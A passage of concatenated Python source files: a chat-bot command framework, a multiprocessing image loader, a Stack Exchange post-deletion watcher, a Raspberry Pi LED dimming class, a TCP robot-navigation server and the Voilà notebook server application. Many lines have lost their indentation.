argparse.set_arg_types(arg_types)
argparse.set_from_function(function)
argparse.set_kwargs(kwargs, function)
# argparse.get_from_function(self.function)
return argparse
def get_doc(self):
doc = Doc(self.name, repr(self))
doc.set_arg_types(self._args)
doc.set_from_function(self.function)
self._doc = doc
return doc
@property
def doc(self):
if self._doc is not None: return self._doc
self._doc = str(self.get_doc())
return self._doc
def execute(self, msg):
if not hasattr(msg, 'args'):
msg.args = split_arguments(msg.body)[1:]
if '--help' in msg.args or '-h' in msg.args:
# Return documentation.
msg.reply(str(self.get_doc()))
return
try:
args = self.argparse.parse(msg.args, msg)
except Exception as e:
return msg.short_reply(e)
try:
self.control(msg)
except PrintableException as e:
return msg.user.send_warning(e)
try:
response = self.function(msg, *args)
except PrintableException as e:
response = unicode(e)
except Exception:
logger.error(traceback.format_exc())
            msg.user.send_warning('The command %s did not finish correctly.' % repr(self))
return
if response is not None:
msg.reply(response)
def control(self, msg):
if hasattr(self.function, 'control'):
return self.function.control.check(msg)
if hasattr(self.function, 'command_decorator') and \
hasattr(self.function.command_decorator, 'control'):
return self.function.command_decorator.control.check(msg)
return True
def __repr__(self):
if self.symbol:
return settings.SYMBOL + self.name
else:
return self.name
class Commands(defaultdict):
def __init__(self):
super(Commands, self).__init__(list)
def incoming(self, msg):
if msg.is_from_me:
return
if not msg.body.startswith(settings.SYMBOL):
return
if msg.historical:
return
args = split_arguments(msg.body)
        if args[0] not in self:
            # Not a command; ignore it.
            return
cmd, args = args[0], args[1:]
msg.args = args
for command in self[cmd]:
l = threading.Thread(target=command.execute, args=(msg,))
l.start()
def add_command(self, name, function, *args, **kwargs):
cmd = Command(name, function, *args, **kwargs)
self[repr(cmd)].append(cmd)
def search(self, term):
results_cmd = []
results_doc = []
for cmd_repr in self.keys():
if not in_str_no_case(term, cmd_repr):
continue
results_cmd.append("%s (%s)" % (cmd_repr, highlight_occurrence(cmd_repr, term)))
for command_list in self.values():
for command in command_list:
if not in_str_no_case(term, command.doc):
continue
context = limit_context(term, command.doc)
results_doc.append("%s (%s)" % (
repr(command), highlight_occurrence(context, term)
))
return results_cmd, results_doc
cmds = Commands()
@optional_args
def command(func, *args, **kwargs):
return func(*args, **kwargs)
@optional_args
class command:
def __init__(self, *args, **kwargs):
self.args = args
self.kwargs = kwargs
if len(args) > 1:
name = args[1]
else:
name = args[0].func_name
args[0].command_decorator = self
self.name = name
cmds.add_command(name, args[0], *args[1:], **kwargs)
def __repr__(self):
return '<@Command %s>' % self.name
def __call__(self, func):
return func(*self.args, **self.kwargs)
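# Usage sketch (assumption: 'hello' is an illustrative command name; the decorated
# function receives the incoming message, plus any parsed arguments, as seen in
# Command.execute above):
#
# @command('hello')
# def hello(msg):
#     return 'Hello %s' % msg.user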
|
multiprocessing.py
|
from multiprocessing import Queue, JoinableQueue
import torch
from PIL import Image
from torch import multiprocessing
from torchvision.transforms import Compose, Resize, ToTensor, ColorJitter
torch.set_num_threads(1)
T = Compose([Resize((224, 224)), ColorJitter(brightness=[0.8, 1.6]), ToTensor()])
def read_img(
path_queue: multiprocessing.JoinableQueue, data_queue: multiprocessing.SimpleQueue
):
torch.set_num_threads(1)
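    # Worker loop: block on the path queue, load and transform the image, push the
    # resulting tensor onto the shared data queue, then mark the path as done so
    # that path_queue.join() in the parent process can return.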
while True:
img_path = path_queue.get()
img = Image.open(img_path)
data_queue.put(T(img))
path_queue.task_done()
def read_img2(img_path):
img = Image.open(img_path)
return T(img)
class multiprocessing_mapping(object):
def __init__(self, num_workers=4, transform=read_img) -> None:
super().__init__()
self.num_workers = num_workers
self.transform = transform
self.data_queue = Queue()
self.path_queue = JoinableQueue()
self.path_queue.cancel_join_thread()
self.workers = [
multiprocessing.Process(
target=self.transform, args=(self.path_queue, self.data_queue)
)
for _ in range(self.num_workers)
]
for w in self.workers:
w.daemon = True # ensure that the worker exits on process exit
w.start()
def __call__(self, img_path_list):
for i in img_path_list:
self.path_queue.put(i)
self.path_queue.join()
return [self.data_queue.get() for _ in range(len(img_path_list))]
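# Usage sketch (assumption: the two .jpg paths below are placeholders and must point
# to real image files before this will run):
if __name__ == "__main__":
    mapper = multiprocessing_mapping(num_workers=2)
    # __call__ blocks until the workers have transformed every path, then drains the
    # data queue; results come back in completion order, not necessarily input order.
    tensors = mapper(["example_0.jpg", "example_1.jpg"])
    print(len(tensors), tensors[0].shape)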
|
deletionwatcher.py
|
# coding=utf-8
import json
import os.path
import requests
import time
import threading
# noinspection PyPackageRequirements
import websocket
# noinspection PyPackageRequirements
from bs4 import BeautifulSoup
from urllib.parse import urlparse
import chatcommunicate
import metasmoke
from globalvars import GlobalVars
import datahandling
from helpers import log
from parsing import fetch_post_id_and_site_from_url, to_protocol_relative
from tasks import Tasks
PICKLE_FILENAME = "deletionIDs.p"
# noinspection PyClassHasNoInit,PyBroadException,PyMethodParameters
class DeletionWatcher:
next_request_time = time.time() - 1
def __init__(self):
if GlobalVars.no_deletion_watcher:
return
self.posts = {}
self.posts_lock = threading.Lock()
self.save_handle = None
self.save_handle_lock = threading.Lock()
try:
self.socket = websocket.create_connection("wss://qa.sockets.stackexchange.com/")
except websocket.WebSocketException:
self.socket = None
log('error', 'DeletionWatcher failed to create a websocket connection')
return
if datahandling.has_pickle(PICKLE_FILENAME):
pickle_data = datahandling.load_pickle(PICKLE_FILENAME)
for post in DeletionWatcher._check_batch(pickle_data):
self.subscribe(post, pickle=False)
self._schedule_save()
threading.Thread(name="deletion watcher", target=self._start, daemon=True).start()
def _start(self):
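        # Reads frames from the Stack Exchange websocket: "hb" frames are heartbeats
        # that must be echoed back, everything else carries an "action" key matching
        # the "<site_id>-question-<question_id>" strings registered in self.posts.
        # When a watched post is reported deleted, the subscription is dropped and
        # any registered callbacks that have not timed out are invoked.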
while True:
msg = self.socket.recv()
if msg:
msg = json.loads(msg)
action = msg["action"]
if action == "hb":
self.socket.send("hb")
else:
data = json.loads(msg["data"])
if data["a"] == "post-deleted":
try:
with self.posts_lock:
post_id, _, _, post_url, callbacks = self.posts[action]
if post_id == str(data["aId"] if "aId" in data else data["qId"]):
with self.posts_lock:
del self.posts[action]
Tasks.do(self._unsubscribe, action)
Tasks.do(metasmoke.Metasmoke.send_deletion_stats_for_post, post_url, True)
for callback, max_time in callbacks:
if not max_time or time.time() < max_time:
callback()
except KeyError:
pass
def subscribe(self, post_url, callback=None, pickle=True, timeout=None):
if GlobalVars.no_deletion_watcher:
return
post_id, post_site, post_type = fetch_post_id_and_site_from_url(post_url)
with GlobalVars.site_id_dict_lock:
site_id = GlobalVars.site_id_dict.get(post_site, None)
if not site_id:
log("warning", "unknown site {} when subscribing to {}".format(post_site, post_url))
return
if post_type == "answer":
question_id = datahandling.get_post_site_id_link((post_id, post_site, post_type))
if question_id is None:
return
else:
question_id = post_id
action = "{}-question-{}".format(site_id, question_id)
max_time = (time.time() + timeout) if timeout else None
with self.posts_lock:
if action not in self.posts:
self.posts[action] = (post_id, post_site, post_type, post_url,
[(callback, max_time)] if callback else [])
Tasks.do(self._subscribe, action)
elif callback:
_, _, _, _, callbacks = self.posts[action]
callbacks.append((callback, max_time))
else:
return
if pickle:
self._schedule_save()
def _subscribe(self, action):
if self.socket:
try:
self.socket.send(action)
except websocket.WebSocketException:
log('error', 'DeletionWatcher failed to subscribe to {}'.format(action))
else:
log('warning', 'DeletionWatcher tried to subscribe to {}, but no WebSocket available.'.format(action))
def _schedule_save(self):
with self.save_handle_lock:
if self.save_handle:
self.save_handle.cancel()
            self.save_handle = Tasks.do(self._save)
def _save(self):
pickle_output = {}
with self.posts_lock:
for post_id, post_site, _, _, _ in self.posts.values():
if post_site not in pickle_output:
pickle_output[post_site] = [post_id]
else:
pickle_output[post_site].append(post_id)
datahandling.dump_pickle(PICKLE_FILENAME, pickle_output)
@staticmethod
def _check_batch(saved):
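        # Queries the Stack Exchange /posts API for the pickled post IDs per site,
        # honouring any requested backoff, and yields links for posts that are less
        # than two hours old so they can be re-subscribed.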
if time.time() < DeletionWatcher.next_request_time:
time.sleep(DeletionWatcher.next_request_time - time.time())
for site, posts in saved.items():
ids = ";".join(post_id for post_id in posts if not DeletionWatcher._ignore((post_id, site)))
uri = "https://api.stackexchange.com/2.2/posts/{}".format(ids)
params = {
'site': site,
'key': 'IAkbitmze4B8KpacUfLqkw(('
}
res = requests.get(uri, params=params)
json = res.json()
if "items" not in json:
log('warning',
'DeletionWatcher API request received no items in response (code {})'.format(res.status_code))
log('warning', res.text)
return
if 'backoff' in json:
DeletionWatcher.next_request_time = time.time() + json['backoff']
for post in json['items']:
if time.time() - post["creation_date"] < 7200:
yield to_protocol_relative(post["link"]).replace("/q/", "/questions/")
def _unsubscribe(self, action):
if self.socket:
try:
self.socket.send("-" + action)
except websocket.WebSocketException:
log('error', 'DeletionWatcher failed to unsubscribe to {}'.format(action))
else:
log('warning', 'DeletionWatcher tried to unsubscribe to {}, but no WebSocket available.'.format(action))
@staticmethod
def _ignore(post_site_id):
return datahandling.is_false_positive(post_site_id) or datahandling.is_ignored_post(post_site_id) or \
datahandling.is_auto_ignored_post(post_site_id)
|
LedHandler.py
|
import time
import LogHandler
mylogger = LogHandler.LogHandler("ledhandler")
try:
import RPi.GPIO as GPIO
except RuntimeError:
mylogger.logger.error("Error importing RPi.GPIO! This is probably because you need superuser privileges. You can achieve this by using 'sudo' to run your script")
import threading
class LedHandler():
def __init__(self, channel, freq=300):
self.channel = channel
self.dc = 0 # where dc is the duty cycle (0.0 <= dc <= 100.0)
frequency = freq # Hz
self.dc_target = self.dc
# set gpio
GPIO.setmode(GPIO.BOARD)
GPIO.setup(channel, GPIO.OUT, initial=GPIO.LOW)
self.pin = GPIO.PWM(channel, frequency)
# start pwm
self.start(self.dc)
mylogger.logger.info('LedHandler object is created')
def led_dc_controller(self, dc, mode="grad"):
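        # mode="grad" fades to the target duty cycle in a background thread
        # (set_dc_with_gradient), while mode="dc" jumps straight to it (set_dc).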
self.dc_target = dc
if mode == "grad":
actual_led = threading.Thread(target=self.set_dc_with_gradient_thrd)
actual_led.daemon = True
actual_led.start()
if mode == "dc":
actual_led = threading.Thread(target=self.set_dc_thrd)
actual_led.daemon = True
actual_led.start()
def set_dc_with_gradient_thrd(self):
self.set_dc_with_gradient(self.dc_target)
def set_dc_thrd(self):
self.set_dc(self.dc_target)
# SET DUTY CYCLE
def set_dc(self, dc):
self.dc = dc
self.pin.ChangeDutyCycle(self.dc)
mylogger.logger.info('Change duty cycle: ' + str(self.dc))
# SET DC WITH DIM EFFECT
def set_dc_with_gradient(self, dc):
dc = int(dc)
step = 3
step_delay = 0.02
mylogger.logger.info('Make gradient: {} to {}'.format(self.dc, dc))
if dc > self.dc:
for grad in range(self.dc, dc+1, step):
time.sleep(step_delay)
self.set_dc(grad)
#print(grad)
self.set_dc(dc)
if dc < self.dc:
for grad in range(self.dc, dc-1, -step):
time.sleep(step_delay)
self.set_dc(grad)
#print(grad)
self.set_dc(dc)
if dc == self.dc:
self.set_dc(dc)
# STOP PWM
def stop(self):
self.pin.stop()
        mylogger.logger.info('stopping pwm')
# START PWM
def start(self, dc=None):
if dc is None:
dc = self.dc
mylogger.logger.info('set dc from self.dc: ' + str(dc))
self.pin.start(dc)
mylogger.logger.info('Start PWM')
    def __del__(self):
        try:
            print('kill object: stop and cleanup')
            self.pin.stop()
        except Exception as e:
            print(e)
        finally:
            GPIO.cleanup(self.channel)
if __name__ == "__main__":
green = LedHandler(channel=12)
time.sleep(1)
#green.set_dc_with_gradient(50)
green.led_dc_controller(50)
time.sleep(5)
#green.set_dc_with_gradient(100)
green.led_dc_controller(100)
time.sleep(5)
#green.set_dc_with_gradient(50)
green.led_dc_controller(50)
time.sleep(5)
#green.set_dc_with_gradient(0)
green.led_dc_controller(0)
time.sleep(1)
input()
|
server.py
|
from socket import socket, AF_INET, SOCK_STREAM, timeout
from threading import Thread
from helper import *
class Server:
def __init__(self, address, port):
self.sock = socket(AF_INET, SOCK_STREAM)
self.sock.bind((address, port))
self.sock.listen()
print("server started at " + str(address) + ":" + str(port))
def handler(self, connection, address):
print("established connection from {}:{}".format(*address))
phase = 0
username_hash = 0
first_position = 0, 0
second_position = 0, 0
actual_position = 0, 0
direction = 4
picked = False
last_action = None
recharging = False
temp_data = ""
processed = False
try:
while True:
if not processed:
data = connection.recv(1024).decode("utf-8")
# print(data)
temp_data += data
before, sep, after = temp_data.partition("\a\b")
syntax_check(before, phase, last_action, sep)
if sep == "":
continue
decoded = before
temp_data = after
print("Received: ", decoded, sep="")
if before and after and "\a\b" in after:
processed = True
else:
processed = False
if decoded == "RECHARGING":
connection.settimeout(TIMEOUT_RECHARGING)
recharging = True
continue
if decoded == "FULL POWER":
recharging = False
connection.settimeout(TIMEOUT)
continue
if recharging:
connection.sendall(create_message(SERVER_LOGIC_ERROR))
break
if phase == 0:
username_hash = compute_hash(decoded)
print("Sending: ", username_hash, sep="")
connection.sendall(create_message((username_hash + SERVER_KEY) % 65536))
phase = 1
elif phase == 1:
if (int(decoded) + 65536 - CLIENT_KEY) % 65536 == username_hash:
print("Sending: ", SERVER_OK, sep="")
connection.sendall(create_message(SERVER_OK))
print("Sending: ", SERVER_MOVE, sep="")
connection.sendall(create_message(SERVER_MOVE))
phase = 2
else:
print("Sending: ", SERVER_LOGIN_FAILED, sep="")
connection.sendall(create_message(SERVER_LOGIN_FAILED))
break
elif phase == 2:
if "OK" in decoded:
split = decoded.split(" ")
first_position = int(split[1]), int(split[2])
print("Sending: ", SERVER_MOVE, sep="")
connection.sendall(create_message(SERVER_MOVE))
phase = 3
elif phase == 3:
if "OK" in decoded:
split = decoded.split(" ")
second_position = int(split[1]), int(split[2])
if second_position != first_position:
actual_position = second_position
direction = get_direction(first_position, second_position)
print("Coordinates = ", actual_position, sep="")
print("Direction = ", direction, sep="")
phase = 4
else:
first_position = second_position
print("Sending: ", SERVER_MOVE, sep="")
connection.sendall(create_message(SERVER_MOVE))
if phase == 4:
if actual_position == (-2, 2):
phase = 5
else:
split = decoded.split(" ")
actual_position = (int(split[1]), int(split[2]))
move, actual_position, direction = get_next_move(actual_position, direction)
print("Sending: ", move, sep="")
print("Position: ", actual_position, " Direction: ", direction, sep="")
last_action = move
connection.sendall(create_message(move))
if phase == 5:
if picked and decoded != "" and last_action != SERVER_TURN_RIGHT and last_action != SERVER_TURN_LEFT:
phase = 42
else:
action, actual_position, direction, picked = search_box(actual_position, direction, picked)
print("Sending: ", action, sep="")
print("Position: ", actual_position, " Direction: ", direction)
last_action = action
connection.sendall(create_message(action))
if phase == 42:
print("Sending: ", SERVER_LOGOUT, sep="")
connection.sendall(create_message(SERVER_LOGOUT))
break
        except timeout:
print("Timeout!")
except InvalidMessage as e:
print("Sending: ", SERVER_SYNTAX_ERROR, sep="")
print(e, sep="")
connection.sendall(create_message(SERVER_SYNTAX_ERROR))
finally:
connection.close()
def run(self):
while True:
connection, address = self.sock.accept()
connection.settimeout(TIMEOUT)
t = Thread(target=self.handler, args=(connection, address))
t.start()
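# Usage sketch (assumption: TIMEOUT and the SERVER_*/CLIENT_KEY constants are
# provided by helper.py, which is imported above but not shown; the address and
# port below are illustrative):
if __name__ == "__main__":
    Server("127.0.0.1", 3999).run()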
|
app.py
|
#############################################################################
# Copyright (c) 2018, Voilà Contributors #
# Copyright (c) 2018, QuantStack #
# #
# Distributed under the terms of the BSD 3-Clause License. #
# #
# The full license is in the file LICENSE, distributed with this software. #
#############################################################################
import gettext
import io
import sys
import json
import logging
import threading
import tempfile
import os
import shutil
import signal
import socket
import webbrowser
import errno
import random
try:
from urllib.parse import urljoin
from urllib.request import pathname2url
except ImportError:
from urllib import pathname2url
from urlparse import urljoin
import jinja2
import tornado.ioloop
import tornado.web
from traitlets.config.application import Application
from traitlets.config.loader import Config
from traitlets import Unicode, Integer, Bool, Dict, List, default
from jupyter_server.services.kernels.kernelmanager import AsyncMappingKernelManager
from jupyter_server.services.kernels.handlers import KernelHandler, ZMQChannelsHandler
from jupyter_server.services.contents.largefilemanager import LargeFileManager
from jupyter_server.base.handlers import FileFindHandler, path_regex
from jupyter_server.config_manager import recursive_update
from jupyter_server.utils import url_path_join, run_sync
from jupyter_server.services.config import ConfigManager
from jupyter_client.kernelspec import KernelSpecManager
from jupyter_core.paths import jupyter_config_path, jupyter_path
from ipython_genutils.py3compat import getcwd
from .paths import ROOT, STATIC_ROOT, collect_template_paths, collect_static_paths
from .handler import VoilaHandler
from .treehandler import VoilaTreeHandler
from ._version import __version__
from .static_file_handler import MultiStaticFileHandler, TemplateStaticFileHandler, WhiteListFileHandler
from .configuration import VoilaConfiguration
from .execute import VoilaExecutor
from .exporter import VoilaExporter
_kernel_id_regex = r"(?P<kernel_id>\w+-\w+-\w+-\w+-\w+)"
def _(x):
return x
class Voila(Application):
name = 'voila'
version = __version__
examples = 'voila example.ipynb --port 8888'
flags = {
'debug': (
{
'Voila': {'log_level': logging.DEBUG},
'VoilaConfiguration': {'show_tracebacks': True},
},
_("Set the log level to logging.DEBUG, and show exception tracebacks in output.")
),
'no-browser': ({'Voila': {'open_browser': False}}, _('Don\'t open the notebook in a browser after startup.'))
}
description = Unicode(
"""voila [OPTIONS] NOTEBOOK_FILENAME
This launches a stand-alone server for read-only notebooks.
"""
)
option_description = Unicode(
"""
notebook_path:
File name of the Jupyter notebook to display.
"""
)
notebook_filename = Unicode()
port = Integer(
8866,
config=True,
help=_(
'Port of the Voilà server. Default 8866.'
)
)
autoreload = Bool(
False,
config=True,
help=_(
            'Autoreload the server and the page when a template, js file or Python code changes'
)
)
root_dir = Unicode(config=True, help=_('The directory to use for notebooks.'))
static_root = Unicode(
STATIC_ROOT,
config=True,
help=_(
'Directory holding static assets (HTML, JS and CSS files).'
)
)
aliases = {
'port': 'Voila.port',
'static': 'Voila.static_root',
'strip_sources': 'VoilaConfiguration.strip_sources',
'autoreload': 'Voila.autoreload',
'template': 'VoilaConfiguration.template',
'theme': 'VoilaConfiguration.theme',
'base_url': 'Voila.base_url',
'server_url': 'Voila.server_url',
'enable_nbextensions': 'VoilaConfiguration.enable_nbextensions',
'show_tracebacks': 'VoilaConfiguration.show_tracebacks',
}
classes = [
VoilaConfiguration,
VoilaExecutor,
VoilaExporter
]
connection_dir_root = Unicode(
config=True,
help=_(
            'Location of temporary connection files. Defaults '
'to system `tempfile.gettempdir()` value.'
)
)
connection_dir = Unicode()
base_url = Unicode(
'/',
config=True,
help=_(
'Path for Voilà API calls. If server_url is unset, this will be \
used for both the base route of the server and the client. \
            If server_url is set, the server will serve the routes prefixed \
by server_url, while the client will prefix by base_url (this is \
useful in reverse proxies).'
)
)
server_url = Unicode(
None,
config=True,
allow_none=True,
help=_(
            'Path prefix for Voilà API handlers. Leave unset to default to base_url'
)
)
notebook_path = Unicode(
None,
config=True,
allow_none=True,
help=_(
'path to notebook to serve with Voilà'
)
)
template_paths = List(
[],
config=True,
help=_(
'path to jinja2 templates'
)
)
static_paths = List(
[STATIC_ROOT],
config=True,
help=_(
'paths to static assets'
)
)
port_retries = Integer(50, config=True,
help=_("The number of additional ports to try if the specified port is not available.")
)
ip = Unicode('localhost', config=True,
help=_("The IP address the notebook server will listen on."))
open_browser = Bool(True, config=True,
help=_("""Whether to open in a browser after starting.
The specific browser used is platform dependent and
determined by the python standard library `webbrowser`
module, unless it is overridden using the --browser
(NotebookApp.browser) configuration option.
"""))
browser = Unicode(u'', config=True,
help="""Specify what command to use to invoke a web
browser when opening the notebook. If not specified, the
default browser will be determined by the `webbrowser`
standard library module, which allows setting of the
BROWSER environment variable to override it.
""")
webbrowser_open_new = Integer(2, config=True,
help=_("""Specify Where to open the notebook on startup. This is the
`new` argument passed to the standard library method `webbrowser.open`.
The behaviour is not guaranteed, but depends on browser support. Valid
values are:
- 2 opens a new tab,
- 1 opens a new window,
- 0 opens in an existing window.
See the `webbrowser.open` documentation for details.
"""))
custom_display_url = Unicode(u'', config=True,
help=_("""Override URL shown to users.
Replace actual URL, including protocol, address, port and base URL,
with the given value when displaying URL to the users. Do not change
the actual connection URL. If authentication token is enabled, the
token is added to the custom URL automatically.
This option is intended to be used when the URL to display to the user
cannot be determined reliably by the Jupyter notebook server (proxified
or containerized setups for example)."""))
@property
def display_url(self):
if self.custom_display_url:
url = self.custom_display_url
if not url.endswith('/'):
url += '/'
else:
if self.ip in ('', '0.0.0.0'):
ip = "%s" % socket.gethostname()
else:
ip = self.ip
url = self._url(ip)
# TODO: do we want to have the token?
# if self.token:
# # Don't log full token if it came from config
# token = self.token if self._token_generated else '...'
# url = (url_concat(url, {'token': token})
# + '\n or '
# + url_concat(self._url('127.0.0.1'), {'token': token}))
return url
@property
def connection_url(self):
ip = self.ip if self.ip else 'localhost'
return self._url(ip)
def _url(self, ip):
# TODO: https / certfile
# proto = 'https' if self.certfile else 'http'
proto = 'http'
return "%s://%s:%i%s" % (proto, ip, self.port, self.base_url)
config_file_paths = List(
Unicode(),
config=True,
help=_(
'Paths to search for voila.(py|json)'
)
)
tornado_settings = Dict(
{},
config=True,
help=_(
'Extra settings to apply to tornado application, e.g. headers, ssl, etc'
)
)
@default('config_file_paths')
def _config_file_paths_default(self):
return [os.getcwd()] + jupyter_config_path()
@default('connection_dir_root')
def _default_connection_dir(self):
connection_dir = tempfile.gettempdir()
self.log.info('Using %s to store connection files' % connection_dir)
return connection_dir
@default('log_level')
def _default_log_level(self):
return logging.INFO
# similar to NotebookApp, except no extra path
@property
def nbextensions_path(self):
"""The path to look for Javascript notebook extensions"""
path = jupyter_path('nbextensions')
# FIXME: remove IPython nbextensions path after a migration period
try:
from IPython.paths import get_ipython_dir
except ImportError:
pass
else:
path.append(os.path.join(get_ipython_dir(), 'nbextensions'))
return path
@default('root_dir')
def _default_root_dir(self):
if self.notebook_path:
return os.path.dirname(os.path.abspath(self.notebook_path))
else:
return getcwd()
def _init_asyncio_patch(self):
"""set default asyncio policy to be compatible with tornado
Tornado 6 (at least) is not compatible with the default
asyncio implementation on Windows
Pick the older SelectorEventLoopPolicy on Windows
if the known-incompatible default policy is in use.
do this as early as possible to make it a low priority and overrideable
ref: https://github.com/tornadoweb/tornado/issues/2608
FIXME: if/when tornado supports the defaults in asyncio,
remove and bump tornado requirement for py38
"""
if sys.platform.startswith("win") and sys.version_info >= (3, 8):
import asyncio
try:
from asyncio import (
WindowsProactorEventLoopPolicy,
WindowsSelectorEventLoopPolicy,
)
except ImportError:
pass
# not affected
else:
if type(asyncio.get_event_loop_policy()) is WindowsProactorEventLoopPolicy:
# WindowsProactorEventLoopPolicy is not compatible with tornado 6
# fallback to the pre-3.8 default of Selector
asyncio.set_event_loop_policy(WindowsSelectorEventLoopPolicy())
def initialize(self, argv=None):
self._init_asyncio_patch()
self.log.debug("Searching path %s for config files", self.config_file_paths)
# to make config_file_paths settable via cmd line, we first need to parse it
super(Voila, self).initialize(argv)
if len(self.extra_args) == 1:
arg = self.extra_args[0]
# I am not sure why we need to check if self.notebook_path is set, can we get rid of this?
if not self.notebook_path:
if os.path.isdir(arg):
self.root_dir = arg
elif os.path.isfile(arg):
self.notebook_path = arg
else:
raise ValueError('argument is neither a file nor a directory: %r' % arg)
elif len(self.extra_args) != 0:
raise ValueError('provided more than 1 argument: %r' % self.extra_args)
# then we load the config
self.load_config_file('voila', path=self.config_file_paths)
# common configuration options between the server extension and the application
self.voila_configuration = VoilaConfiguration(parent=self)
self.setup_template_dirs()
signal.signal(signal.SIGTERM, self._handle_signal_stop)
def setup_template_dirs(self):
if self.voila_configuration.template:
template_name = self.voila_configuration.template
self.template_paths = collect_template_paths(['voila', 'nbconvert'], template_name, prune=True)
self.static_paths = collect_static_paths(['voila', 'nbconvert'], template_name)
conf_paths = [os.path.join(d, 'conf.json') for d in self.template_paths]
for p in conf_paths:
# see if config file exists
if os.path.exists(p):
# load the template-related config
with open(p) as json_file:
conf = json.load(json_file)
# update the overall config with it, preserving CLI config priority
if 'traitlet_configuration' in conf:
recursive_update(conf['traitlet_configuration'], self.voila_configuration.config.VoilaConfiguration)
# pass merged config to overall Voilà config
self.voila_configuration.config.VoilaConfiguration = Config(conf['traitlet_configuration'])
self.log.debug('using template: %s', self.voila_configuration.template)
self.log.debug('template paths:\n\t%s', '\n\t'.join(self.template_paths))
self.log.debug('static paths:\n\t%s', '\n\t'.join(self.static_paths))
if self.notebook_path and not os.path.exists(self.notebook_path):
raise ValueError('Notebook not found: %s' % self.notebook_path)
def _handle_signal_stop(self, sig, frame):
self.log.info('Handle signal %s.' % sig)
self.ioloop.add_callback_from_signal(self.ioloop.stop)
def start(self):
self.connection_dir = tempfile.mkdtemp(
prefix='voila_',
dir=self.connection_dir_root
)
self.log.info('Storing connection files in %s.' % self.connection_dir)
self.log.info('Serving static files from %s.' % self.static_root)
self.kernel_spec_manager = KernelSpecManager(
parent=self
)
self.kernel_manager = AsyncMappingKernelManager(
parent=self,
connection_dir=self.connection_dir,
kernel_spec_manager=self.kernel_spec_manager,
allowed_message_types=[
'comm_open',
'comm_close',
'comm_msg',
'comm_info_request',
'kernel_info_request',
'shutdown_request'
]
)
jenv_opt = {"autoescape": True} # we might want extra options via cmd line like notebook server
env = jinja2.Environment(loader=jinja2.FileSystemLoader(self.template_paths), extensions=['jinja2.ext.i18n'], **jenv_opt)
nbui = gettext.translation('nbui', localedir=os.path.join(ROOT, 'i18n'), fallback=True)
env.install_gettext_translations(nbui, newstyle=False)
self.contents_manager = LargeFileManager(parent=self)
        # we create a config manager that loads both the serverconfig and nbconfig (classic notebook)
read_config_path = [os.path.join(p, 'serverconfig') for p in jupyter_config_path()]
read_config_path += [os.path.join(p, 'nbconfig') for p in jupyter_config_path()]
self.config_manager = ConfigManager(parent=self, read_config_path=read_config_path)
# default server_url to base_url
self.server_url = self.server_url or self.base_url
self.app = tornado.web.Application(
base_url=self.base_url,
server_url=self.server_url or self.base_url,
kernel_manager=self.kernel_manager,
kernel_spec_manager=self.kernel_spec_manager,
allow_remote_access=True,
autoreload=self.autoreload,
voila_jinja2_env=env,
jinja2_env=env,
static_path='/',
server_root_dir='/',
contents_manager=self.contents_manager,
config_manager=self.config_manager
)
self.app.settings.update(self.tornado_settings)
handlers = []
handlers.extend([
(url_path_join(self.server_url, r'/api/kernels/%s' % _kernel_id_regex), KernelHandler),
(url_path_join(self.server_url, r'/api/kernels/%s/channels' % _kernel_id_regex), ZMQChannelsHandler),
(
url_path_join(self.server_url, r'/voila/templates/(.*)'),
TemplateStaticFileHandler
),
(
url_path_join(self.server_url, r'/voila/static/(.*)'),
MultiStaticFileHandler,
{
'paths': self.static_paths,
'default_filename': 'index.html'
},
),
])
# Serving notebook extensions
if self.voila_configuration.enable_nbextensions:
handlers.append(
(
url_path_join(self.server_url, r'/voila/nbextensions/(.*)'),
FileFindHandler,
{
'path': self.nbextensions_path,
'no_cache_paths': ['/'], # don't cache anything in nbextensions
},
)
)
handlers.append(
(
url_path_join(self.server_url, r'/voila/files/(.*)'),
WhiteListFileHandler,
{
'whitelist': self.voila_configuration.file_whitelist,
'blacklist': self.voila_configuration.file_blacklist,
'path': self.root_dir,
},
)
)
tree_handler_conf = {
'voila_configuration': self.voila_configuration
}
if self.notebook_path:
handlers.append((
url_path_join(self.server_url, r'/(.*)'),
VoilaHandler,
{
'notebook_path': os.path.relpath(self.notebook_path, self.root_dir),
'template_paths': self.template_paths,
'config': self.config,
'voila_configuration': self.voila_configuration
}
))
else:
self.log.debug('serving directory: %r', self.root_dir)
handlers.extend([
(self.server_url, VoilaTreeHandler, tree_handler_conf),
(url_path_join(self.server_url, r'/voila/tree' + path_regex),
VoilaTreeHandler, tree_handler_conf),
(url_path_join(self.server_url, r'/voila/render/(.*)'),
VoilaHandler,
{
'template_paths': self.template_paths,
'config': self.config,
'voila_configuration': self.voila_configuration
}),
])
self.app.add_handlers('.*$', handlers)
self.listen()
def stop(self):
shutil.rmtree(self.connection_dir)
run_sync(self.kernel_manager.shutdown_all())
def random_ports(self, port, n):
"""Generate a list of n random ports near the given port.
The first 5 ports will be sequential, and the remaining n-5 will be
randomly selected in the range [port-2*n, port+2*n].
"""
for i in range(min(5, n)):
yield port + i
for i in range(n-5):
yield max(1, port + random.randint(-2*n, 2*n))
    def listen(self):
        success = False
        for port in self.random_ports(self.port, self.port_retries+1):
try:
self.app.listen(port)
self.port = port
self.log.info('Voilà is running at:\n%s' % self.display_url)
except socket.error as e:
if e.errno == errno.EADDRINUSE:
self.log.info(_('The port %i is already in use, trying another port.') % port)
continue
elif e.errno in (errno.EACCES, getattr(errno, 'WSAEACCES', errno.EACCES)):
self.log.warning(_("Permission to listen on port %i denied") % port)
continue
else:
raise
else:
self.port = port
success = True
break
if not success:
self.log.critical(_('ERROR: the Voilà server could not be started because '
'no available port could be found.'))
self.exit(1)
if self.open_browser:
self.launch_browser()
self.ioloop = tornado.ioloop.IOLoop.current()
try:
self.ioloop.start()
except KeyboardInterrupt:
self.log.info('Stopping...')
finally:
self.stop()
def launch_browser(self):
try:
browser = webbrowser.get(self.browser or None)
except webbrowser.Error as e:
self.log.warning(_('No web browser found: %s.') % e)
browser = None
if not browser:
return
uri = self.base_url
fd, open_file = tempfile.mkstemp(suffix='.html')
# Write a temporary file to open in the browser
with io.open(fd, 'w', encoding='utf-8') as fh:
# TODO: do we want to have the token?
# if self.token:
# url = url_concat(url, {'token': self.token})
url = url_path_join(self.connection_url, uri)
jinja2_env = self.app.settings['jinja2_env']
template = jinja2_env.get_template('browser-open.html')
fh.write(template.render(open_url=url, base_url=url))
def target():
return browser.open(urljoin('file:', pathname2url(open_file)), new=self.webbrowser_open_new)
threading.Thread(target=target).start()
main = Voila.launch_instance
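# Usage sketch (assumption: 'example.ipynb' is a placeholder notebook name), either
# from the command line:
#
#   voila example.ipynb --port 8866 --no-browser
#
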